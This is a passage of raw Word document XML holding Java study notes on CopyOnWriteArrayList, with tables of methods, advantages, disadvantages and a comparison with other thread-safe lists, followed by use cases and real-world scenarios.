            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A9EE7B5"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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D2BF00E"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5F43CE3F" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="428C897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E e)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2483619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s an element at the end of the list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="3A732F1C" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="474C326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lastRenderedPageBreak/>
              <w:t>addAll(Collection&lt;? extends E&gt; c)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5136B2B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Adds all elements from the specified collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="7D908731" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FE31F1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move(Object o)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="772C67A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moves the first occurrence of the specified element</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="4E6BBBA7" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C9F5EC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et(int index, E element)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7904F65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places the element at the specified position</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="521C6152" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="160AD14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get(int index)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="380C7CC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turns the element at the specified position</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="0BB3CE1D" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25CE5E0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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78F936A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Returns a </w:t>
            </w:r>
            <w:r w:rsidRPr="00640264">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>snapshot iterator</w:t>
            </w:r>
            <w:r w:rsidRPr="00640264">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (fail-safe)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0BF6EFC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73C20EBE">
          <v:rect id="_x0000_i6959" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5A46F8"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7. Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7161541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Multi-Threaded Applications:</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Where </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reads dominate writes</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, such as caching or maintaining frequently read data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE4A2F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Event Listeners:</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Where new listeners can be added/removed while events are being processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074CD40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Configuration Data:</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Frequently read data that is rarely updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296F7C9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Data Broadcast Systems:</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Where multiple threads read data concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350AA6F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76BC84E2">
          <v:rect id="_x0000_i6960" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B3EE80"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5920"/>
      </w:tblGrid>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="2121B012" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35D19B1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Advantage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45386FB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1F3D02FE" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="246C630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6D20D29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Ensures safe access without external synchronization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="43526A52" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02A88D0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High Read Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1737660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Read operations are fast as no locking is required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="381FAD1A" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BC5B0B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Fail-Safe Iterators</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A195004"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Do not throw ConcurrentModificationException</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="66CB9F19" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32409DD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napshot Isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73F3B09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s work on a snapshot, not affected by concurrent updates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CA36C1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3942C7AA">
          <v:rect id="_x0000_i6961" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1477227A"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6359"/>
      </w:tblGrid>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="76E40612" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39724D8E"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isadvantage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7116130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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="7237BCEA" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24C9D25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Memory Overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D97C39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Each modification creates a new copy of the list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="42EEE9E3" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F57526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lower Write Operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3401C4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Writing is costly as it requires cloning the entire list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="27801CD7" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="628F8A58"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Not Suitable for Heavy Writes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37BB4CDA"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Best suited when </w:t>
            </w:r>
            <w:r w:rsidRPr="00640264">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>reads significantly outnumber writes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="23365D7F" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78DF2F2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tale Data in Iteration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2521F81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Iterators may not reflect the latest changes as they work on snapshots</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="77ADA94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51F29E72">
          <v:rect id="_x0000_i6962" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C42ED77"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0. Comparison with Other L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443"/>
        <w:gridCol w:w="2625"/>
        <w:gridCol w:w="3199"/>
      </w:tblGrid>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="7A596E79" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E9CD9C2"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="325A8DB1"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ArrayList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56FA8B34"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SynchronizedList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64BB23CD"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opyOnWriteArrayList</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="24F5D612" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53F0139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Thread Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C2C569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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C034E7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Yes (synchronized externally)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75E673C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Yes (internally handled)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="278F8B4B" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06222C6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 (Read)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="680E70A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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D041BC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locks on each read)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71AA266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Very Fast (no lock during reads)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="1C22973F" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48DF824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Performance (Write)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4196BDCE"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st</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EFC6F0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locks on each write)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="453BA48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low (creates a copy on each write)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="617539CC" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7611101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Iterator Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07A2679F"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fast</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C6DF39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fast</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21269D8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Fail-safe (snapshot-based)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00640264" w:rsidRPr="00640264" w14:paraId="27500807" w14:textId="77777777" w:rsidTr="00640264">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69374270"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07FCC22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Single-threaded operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06B0B7C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Low-concurrency writes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4487C2FC"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High-concurrency reads, low writes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4450BD2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63B56583">
          <v:rect id="_x0000_i6963" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68753504"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1. Real-World Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737FCEF7"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 Chat Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0933C4E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A list of </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>connected users</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where most operations are </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reading</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the current list, and new users are added infrequently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2214BBF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ideal as it provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fast reads</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and safe addition/removal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107CA0FF"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2. Configuration Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18390013"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Frequently accessed </w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>configuration properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that change rarely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC49D89"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The list can be read concurrently without affecting performance, while occasional updates are handled seamlessly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADC794B"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41043439">
          <v:rect id="_x0000_i6964" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="57261AFF"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12. Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE67FED"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Use for Read-Mostly Scenarios:</w:t>
      </w:r>
      <w:r w:rsidRPr="00640264">
        <w:rPr>
